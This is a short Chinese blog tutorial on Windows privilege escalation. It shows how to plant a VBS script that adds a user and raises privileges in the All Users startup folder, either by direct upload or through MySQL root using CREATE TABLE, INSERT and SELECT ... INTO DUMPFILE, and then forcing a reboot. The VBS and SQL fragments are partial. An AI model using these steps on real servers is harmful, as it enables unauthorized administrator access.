0x00 原理
重启服务器会自动调用
导入到“ C:\Documents and Settings\All Users\「开始」菜单\程序\启动”下的VBS脚本
,并执行其中的用户添加及提权命令。
0x01 利用条件
两种情况下均可用启动项提权
1、C:\Documents and Settings\All Users\「开始」菜单\程序\启动
目录可读写
直接将 VBS 提权脚本上传到该目录下
2、以root账号
登陆MySQL
0x02 提权关键
启动目录下的vbs脚本
0x03 提权步骤
一、上传VBS提权脚本到启动目录
VBS 提权脚本代码如下:
1 |
setwsnetwork=CreateObject(“WSCRIPT.NETWORK”) |
二、将数据库表中内容导入到启动目录
1、登录mysql
2、在test数据库下新建表
create table secist(cmd text);
3、插入vbs脚本
1 |
insert into secist values(“set wshshell=createobject(“”wscript.shell””)”); |
4、导出vbs脚本到启动选项
1 |
select * from secist into dumpfile “C:\Documents and Settings\All Users\「开始」菜单\程序\启动\quan.vbs”; |
5、利用其他手段使服务器重启后就提权成功了
0x04 参考
https://www.cnblogs.com/wh4am1/p/6613759.html
《网络攻防实战研究——漏洞利用与提权》5.7.2
FROM :b0urne.top | Author:b0urne
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论